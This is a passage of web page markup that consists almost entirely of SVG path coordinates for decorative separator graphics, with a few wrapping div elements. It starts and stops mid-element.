d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.